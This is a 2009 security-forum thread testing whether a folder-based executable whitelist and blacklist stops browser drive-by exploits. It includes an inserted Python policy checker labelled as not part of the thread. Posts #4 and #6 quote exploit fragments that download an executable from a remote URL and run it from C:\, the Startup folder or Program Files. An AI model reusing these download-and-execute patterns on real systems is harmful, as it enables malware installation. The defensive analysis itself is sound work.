Whitelist (folder and files), Blacklist (folders)

Discussion in 'other anti-malware software' started by Joeythedude, Apr 21, 2009.

Thread Status:
Not open for further replies.
  1. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Hi

    I'm interested in opinions on this system.
    It's designed with 2 aims in mind.
    1) To avoid drive-bys and browser exploits which attempt to run an undetected exe file.
    As far as I can see these try and run in the browser cache or system temp files.
    2) To be able to add/remove programs without changing the set-up in any way.

    2 Steps
    1) Whitelist - Will allow all exe in these folders and this specific exe file
    C:\
    C:\Firefox Installation\Firefox.exe


    2) Blacklist - Will deny all exe in these folders, unless an explicit path is given in the whitelist (as for Firefox above)
    C:\Firefox Installation
    C:\TEMP (& any other Temp folders)


    Prog to enforce this list is called trust-no-exe

    What vulnerabilities am I missing?
    The only one I can see is if the malware copies itself to someplace other than in the blacklist.
    This seems to be very uncommon in the exploits I've read of so far.


    P.S & Please don't turn it into a discussion on using sandboxie and LUA etc :)
     
    Last edited: Apr 21, 2009
  2. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,739
    Location:
    New York City
    This program appears to be the precursor to a program called ExeLockdown.
    There are threads discussing the shortfalls of ExeLockdown as compared to Faronics AntiExecutable. AntiExecutable used to be a terrific program until Faronics destroyed it with version 3.
    By the way, this should be listed in 'other anti-malware software' section.
     
    Last edited: Apr 21, 2009
  3. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I've had a look at both those programs & threads.
    AE v2 would allow similar functionality; I would have to turn it off to add a program though.

    This setup will allow me to add and remove programs without doing anything, and yet stop a lot of internet threats.

    The idea here is to block internet threats. What % do people think it would catch ?
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    That's a bit harsh! It's still an effective program but just less user-friendly for the average home user. It's for that reason mainly, that I no longer recommend it.

    It's evident from the Faronics literature that they are directing their efforts almost exclusively to institutions. Not a bad marketing decision when you think about it. Administrators can tailor the White List for specific user environments. For user accounts, it is still Default-Deny.

    I applaud Faronics for keeping this restriction; it makes for a bullet-proof barrier in the average home where only the parent can install something. As you make a security product less restrictive, you provide a potential weakness that a clever person can exploit.

    A similar criticism is made of Faronics' Deep Freeze, where you have to reboot/thaw before making changes. Yes, an extra step and time if you do this a lot, but I appreciate the reboot first, knowing that the system has returned to its previous good state before any changes can be made/saved.

    The only way to be sure is to test!

    One example: The malware could run from C:\ .

    Here is a web exploit I use to test. I'll download astroexp.xyz, copy it to C:\ as astro.exe and execute it:

    Code:
    OOOOOOOOOOOOOwwwwwww ="http://...../astroexp.xyz"
    fname2= F.BuildPath("C:\","astro.exe")
    Q.ShellExecute fname2,
    
    astro-runC.gif

    This is not malware, but a small self-contained program which doesn't write to %System% or the Registry. It could have been a password stealer that connects out to another server.

    This is true, but since you've mentioned White Listing, for the most bullet-proof protection, I want something that watches (White Lists) the entire HD drive to prevent *any* unauthorized executable from executing from *any* location.

    astro-blockC.gif

    I would feel more comfortable with this setup. I'll agree that this is a "potential" vulnerability. It's true that files cache to the temp locations by default, but this test shows that it's possible for code to specify the download directory.

    ----
    rich
     
  5. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Thanks for those points.

    It's true the exploit can go to, say, the C:\ drive and run there in this setup.

    But if say even 50% of the browser exploits can be caught with just this, I'd be very pleased with it.
    It would have no impact on me at all :) , and yet reduce my risks by that amount!

    Rmus, I think you've done a lot of testing of exploits; do you remember if many tried to run themselves outside the browser cache or temp folder?

    J
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    A quick look found three. They cache the malware executable and copy it to another location to run.

    Executable runs from the user's Startup folder

    The user is redirected from a Google link to a malware site, whereupon the exploit code executes:

    Code:
    dstart=obj_WScript.SpecialFolders("Startup");
    daustart+"\\Update_0802_KB072103.exe";
    

    Executable runs from %Windir% Program Files

    njvj-IE.gif

    Executable runs from Program Files

    The code shows the exploit searching for available directories:

    Code:
    var mycars = new Array();
    mycars[0] = "c:/Program Files/wsv.exe";
    mycars[1] = "d:/Program Files/wsv.exe";
    mycars[2] = "e:/Program Files/wsv.exe";
    mycars[3] = "C:/Documents and Settings/All Users/..../Thunder.exe";
    mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
    

    Realizing that you are using Firefox, since all known browser exploits in the wild target IE, you are pretty much immune from this type of attack. Likewise, I've never gotten any of these to run in Opera.

    ----
    rich
     
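    As an added example (not code from this thread, nor from trust-no-exe or any other product named here), the Python below encodes the whitelist/blacklist rules from the opening post and evaluates them against the drop locations quoted in posts #4 and #6 (C:\, the All Users Startup folder, Program Files), alongside a whole-drive, file-only whitelist of the kind Rmus describes. The rule precedence (an explicitly whitelisted file wins, then a blacklisted folder denies, then a whitelisted folder allows, everything else is denied), the `C:\TEMP\payload.exe` sample path and the function names are assumptions made for the example.

```python
import ntpath  # Windows path semantics, so the check also runs on Linux/macOS
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class ExePolicy:
    """The three rule kinds discussed in the thread."""
    whitelist_folders: List[str] = field(default_factory=list)
    whitelist_files: List[str] = field(default_factory=list)
    blacklist_folders: List[str] = field(default_factory=list)


def _norm(p: str) -> str:
    # Normalise separators and case the way Windows compares paths.
    return ntpath.normcase(ntpath.normpath(p))


def _in_folder(path: str, folder: str) -> bool:
    """True if `path` lies anywhere below `folder` (case-insensitive)."""
    return _norm(path).startswith(_norm(folder).rstrip("\\") + "\\")


def decide(policy: ExePolicy, path: str) -> Tuple[str, str]:
    """Return ("allow" | "deny", reason) for an executable at `path`.

    Precedence is an assumption based on the opening post: the explicit
    file whitelist beats a blacklisted folder, which beats a whitelisted
    folder; anything not whitelisted at all is denied (default deny)."""
    if _norm(path) in {_norm(f) for f in policy.whitelist_files}:
        return "allow", "explicitly whitelisted file"
    for folder in policy.blacklist_folders:
        if _in_folder(path, folder):
            return "deny", f"inside blacklisted folder {folder}"
    for folder in policy.whitelist_folders:
        if _in_folder(path, folder):
            return "allow", f"inside whitelisted folder {folder}"
    return "deny", "not whitelisted (default deny)"


def uncovered(policy: ExePolicy, paths: List[str]) -> List[str]:
    """Drop locations the policy would still let run: the 'what am I missing' list."""
    return [p for p in paths if decide(policy, p)[0] == "allow"]


# Policy exactly as the opening post lists it.
THREAD_POLICY = ExePolicy(
    whitelist_folders=["C:\\"],
    whitelist_files=["C:\\Firefox Installation\\Firefox.exe"],
    blacklist_folders=["C:\\Firefox Installation", "C:\\TEMP"],
)

# Whole-drive, file-only whitelist as Rmus prefers: no folder is trusted wholesale.
STRICT_POLICY = ExePolicy(whitelist_files=["C:\\Firefox Installation\\Firefox.exe"])

# Drop locations quoted from the exploits in the thread, plus one constructed
# temp-folder drop (the case the opening post was designed for).
SAMPLE_DROPS = [
    "C:\\TEMP\\payload.exe",                       # constructed: cache/temp drop
    "C:\\astro.exe",                               # post #4: copied to C:\
    "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Thunder.exe",  # post #6
    "c:/Program Files/wsv.exe",                    # post #6: hard-coded Program Files
]


def report(policy: ExePolicy, paths: List[str]) -> List[str]:
    """One human-readable line per path, for the interactive run below."""
    return [f"{verdict:5} {path}  ({why})"
            for path in paths for verdict, why in [decide(policy, path)]]


if __name__ == "__main__":
    for name, pol in (("thread policy", THREAD_POLICY), ("strict policy", STRICT_POLICY)):
        print(f"== {name}: {len(uncovered(pol, SAMPLE_DROPS))} of {len(SAMPLE_DROPS)} drops would run")
        print("\n".join(report(pol, SAMPLE_DROPS)))
```

    Running it shows the point both Rmus posts make: the folder-based policy stops only the temp-folder drop, because whitelisting all of C:\ trusts every location the blacklist does not enumerate, whereas the file-only whitelist stops all four without any per-folder rules.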
  7. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Very interesting. I guess some just take the location from the Windows system variables (i.e. %temp%), and others just hardcode stuff like Program Files, because it has to be there!

    Will have a little re-think; I thought I had found a holy grail of protection without any side-effects.

    I thought there had been FF exploits, didn't know only IE was being used in the wild.

    Although Matt ( remove-malware.com) only used IE ... 6 .... :D
     
    Last edited: Apr 21, 2009
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Note that I said FF is "pretty much immune." That leaves me some wiggle room in case something surfaces to exploit FF in the wild!

    Many vulnerabilities, of course, but these are usually patched quickly before they can become exploits out there.

    However there is nothing wrong with having a fail-safe barrier to block the running of the executable payload in case another barrier (browser in this case) is compromised.

    Think of exploits that target applications/plugins. Should they load in the browser (prevented by configuring in the browser) as in the recent PDF exploit, the executable will run (assuming an unpatched version of the PDF reader).

    Many assumptions and barriers to get past!

    I've not seen enough of these to predict, but the 2 I've gotten to work both run the executable from the browser cache, so your setup takes care of that. So far...


    ----
    rich
     
  9. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    5,633
    Location:
    U.S.A. (South)
    I'm glad I'm still on XP Pro because Faronics' AE2 is bulletproof and its restrictions are second to none IMO for such an app as this, as Rmus has pointed out time and time again with his generous screenshots and commentary/views. Some apps almost defy logic or reason but in reality are very well constructed for optimum protection; this is exactly how I view DEEP FREEZE & AE2.

    EASTER
     